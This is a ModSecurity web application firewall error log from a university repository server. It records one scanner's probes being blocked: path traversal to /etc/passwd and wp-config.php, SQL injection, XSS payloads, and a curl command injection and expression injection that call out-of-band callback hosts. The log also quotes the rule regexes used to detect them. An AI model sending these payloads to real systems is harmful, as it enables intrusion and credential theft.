[Tue Aug 29 11:37:16.695633 2023] [:error] [pid 1307] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data:  found within TX:sqli_select_statement_count: 4"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/fuel/pages/items/"] [unique_id "ZO11-MCo-f0AAAUbhLUAAABQ"]
[Tue Aug 29 11:37:16.737670 2023] [:error] [pid 1474] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11-MCo-f0AAAXCT@cAAAAG"]
[Tue Aug 29 11:37:27.377704 2023] [:error] [pid 1484] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:appno. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: union SELECT found within ARGS:appno:  1 union SELECT 98989*443131,1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/admin/"] [unique_id "ZO12B8Co-f0AAAXM088AAAAe"]
[Tue Aug 29 11:37:35.421458 2023] [:error] [pid 1481] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:log_filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../ found within ARGS:log_filename: ../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO12D8Co-f0AAAXJ6XgAAAAX"]
[Tue Aug 29 11:37:37.569388 2023] [:error] [pid 1409] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-content/plugins/Wordpress/Aaspose-pdf-exporter/aspose_pdf_exporter_download.php"] [unique_id "ZO12EcCo-f0AAAWBBVkAAAAB"]
[Tue Aug 29 11:37:45.370618 2023] [:error] [pid 1490] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:dbkey:syslog.rlog. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:dbkey:syslog.rlog: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfh.unla.ac.id"] [uri "/page/sl_logdl"] [unique_id "ZO12GcCo-f0AAAXSzt4AAAAA"]
[Tue Aug 29 11:37:47.603510 2023] [:error] [pid 1285] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:script. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ):\\x0a     found within ARGS:script: from pyspider.libs.base_handler import *\\x0aclass Handler(BaseHandler):\\x0a    def on_start(self):\\x0a        print(str(452345672   567890765))"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/debug/pyspidervulntest/run"] [unique_id "ZO12G8Co-f0AAAUFdnwAAAA9"]
[Tue Aug 29 11:37:50.443230 2023] [:error] [pid 1481] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:bf_text. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:bf_text: \\x22><img src=x onerror=console.log(123);>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/"] [unique_id "ZO12HsCo-f0AAAXJ6cIAAAAX"]
[Tue Aug 29 11:37:52.425732 2023] [:error] [pid 1469] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:next_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:next_file: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfh.unla.ac.id"] [uri "/adm/file.cgi"] [unique_id "ZO12IMCo-f0AAAW9IhkAAAAI"]
[Tue Aug 29 11:37:59.417624 2023] [:error] [pid 1493] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:logfile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:logfile: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-content/plugins/usc-e-shop/functions/content-log.php"] [unique_id "ZO12J8Co-f0AAAXVyncAAAAB"]
[Tue Aug 29 11:37:59.521474 2023] [:error] [pid 1495] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:lastname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'RiUU'='RiUU found within ARGS:lastname: test' AND (SELECT 6133 FROM (SELECT(SLEEP(6)))nOqb) AND 'RiUU'='RiUU"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/contactus.php"] [unique_id "ZO12J8Co-f0AAAXXhfEAAAAF"]
[Tue Aug 29 11:38:10.672439 2023] [:error] [pid 1523] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../ found within ARGS:filename: ../../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/down_data.php"] [unique_id "ZO12MsCo-f0AAAXz6@QAAAAk"]
[Tue Aug 29 11:38:14.609331 2023] [:error] [pid 1507] [client 143.42.78.27] ModSecurity: collections_remove_stale: Failed deleting collection (name "ip", key "114.79.49.154_4beac20f66f8a379a801308d5aeb55f6d68ce5e4"): Internal error [hostname "repositoryfh.unla.ac.id"] [uri "/index.php/manager/html"] [unique_id "ZO12NsCo-f0AAAXj8mIAAAAQ"]
[Tue Aug 29 11:38:23.383069 2023] [:error] [pid 1532] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:path: ../../../../../../../../../../etc/./zpx/../passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/pacsone/nocache.php"] [unique_id "ZO12P8Co-f0AAAX8PQ4AAAAK"]
[Tue Aug 29 11:38:33.380523 2023] [:error] [pid 1467] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:cID: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-content/plugins/FlagEm/flagit.php"] [unique_id "ZO12ScCo-f0AAAW7FUYAAAAE"]
[Tue Aug 29 11:38:34.479171 2023] [:error] [pid 1546] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:view: <script>alert(document.cookie)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/help/index.jsp"] [unique_id "ZO12SsCo-f0AAAYKOQsAAAAP"]
[Tue Aug 29 11:38:34.512094 2023] [:error] [pid 1547] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ) found within ARGS:url: #{T(java.net.InetAddress).getByName('cjmnbitjmimt14dgn26ge5iyzoq7yk3ut.oast.site')}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repositoryfh.unla.ac.id"] [uri "/pentaho/api/ldap/config/ldapTreeNodeChildren/require.js"] [unique_id "ZO12SsCo-f0AAAYLYbQAAAAQ"]
[Tue Aug 29 11:38:35.369344 2023] [:error] [pid 1521] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:file: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/downloadfile.php"] [unique_id "ZO12S8Co-f0AAAXxYPUAAAAh"]
[Tue Aug 29 11:38:46.379107 2023] [:error] [pid 1566] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-content/plugins/aspose-cloud-ebook-generator/aspose_posts_exporter_download.php"] [unique_id "ZO12VsCo-f0AAAYelUEAAAAV"]
[Tue Aug 29 11:38:47.363760 2023] [:error] [pid 1550] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-content/plugins/aspose-importer-exporter/aspose_import_export_download"] [unique_id "ZO12V8Co-f0AAAYOaF4AAAAa"]
[Tue Aug 29 11:38:47.378366 2023] [:error] [pid 1510] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:filename: ../../ierp/bin/prop.xml"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/NCFindWeb"] [unique_id "ZO12V8Co-f0AAAXm8CwAAAAW"]
[Tue Aug 29 11:38:56.440512 2023] [:error] [pid 1544] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:file_name: ../../../../../Windows/debug/NetSetup.log"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/gespage/doDownloadData"] [unique_id "ZO12YMCo-f0AAAYIYk0AAAAM"]
[Tue Aug 29 11:38:57.385928 2023] [:error] [pid 1574] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /.....///...../// found within ARGS:dir: http/.....///.....///config/config_db.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/include/thumb.php"] [unique_id "ZO12YcCo-f0AAAYmldsAAAAQ"]
[Tue Aug 29 11:38:57.386839 2023] [:error] [pid 1397] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:filename: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/view/action/download_file.php"] [unique_id "ZO12YcCo-f0AAAV1Ee0AAAAd"]
[Tue Aug 29 11:39:06.647307 2023] [:error] [pid 1564] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ...../// found within ARGS:dir: .....///http/.....///config/config_db.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/include/thumb.php"] [unique_id "ZO12asCo-f0AAAYcup4AAAAN"]
[Tue Aug 29 11:39:07.063700 2023] [:error] [pid 1573] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:mdocs-img-preview. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:mdocs-img-preview: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/mdocs-posts/"] [unique_id "ZO12a8Co-f0AAAYlCNEAAAAP"]
[Tue Aug 29 11:39:11.935277 2023] [:error] [pid 1499] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:file: ../../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-content/plugins/cherry-plugin/admin/import-export/download-content.php"] [unique_id "ZO12b8Co-f0AAAXbcAwAAAAL"]
[Tue Aug 29 11:39:12.505662 2023] [:error] [pid 1684] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c found within ARGS:dir: http\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5cconfig\\x5c\\x5cconfig_db.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/include/thumb.php"] [unique_id "ZO12cMCo-f0AAAaULdsAAAAh"]
[Tue Aug 29 11:39:12.569665 2023] [:error] [pid 1673] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:urlConfig. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:urlConfig: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/alerts/alertConfigField.php"] [unique_id "ZO12cMCo-f0AAAaJJsMAAAAJ"]
[Tue Aug 29 11:39:13.258006 2023] [:error] [pid 1700] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:mdocs-img-preview. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:mdocs-img-preview: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/"] [unique_id "ZO12ccCo-f0AAAakQS0AAAAr"]
[Tue Aug 29 11:39:18.688754 2023] [:error] [pid 1472] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: } found within ARGS:id: nuclei%{128*128}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repositoryfh.unla.ac.id"] [uri "/"] [unique_id "ZO12dsCo-f0AAAXA9pQAAAAO"]
[Tue Aug 29 11:39:23.570172 2023] [:error] [pid 1671] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO12e8Co-f0AAAaHMZIAAAAE"]
[Tue Aug 29 11:39:36.564057 2023] [:error] [pid 1729] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:pluginName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:pluginName: ../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/go/add-on/business-continuity/api/plugin"] [unique_id "ZO12iMCo-f0AAAbB7xgAAAAu"]
[Tue Aug 29 11:39:48.703161 2023] [:error] [pid 1569] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:popup. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:popup: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/fw.progrss.details.php"] [unique_id "ZO12lMCo-f0AAAYh9bEAAAAK"]
[Tue Aug 29 11:39:57.375978 2023] [:error] [pid 1673] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:lang. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:lang: ../../../../../usr/local/php/pearcmd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/"] [unique_id "ZO12ncCo-f0AAAaJJ2UAAAAJ"]
[Tue Aug 29 11:40:02.576231 2023] [:error] [pid 1807] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:ip_src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:ip_src: \\x22;curl cjmnbitjmimt14dgn26gmnprfms9ddh3e.oast.site #"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/pandora_console/index.php"] [unique_id "ZO12osCo-f0AAAcPivEAAAAa"]
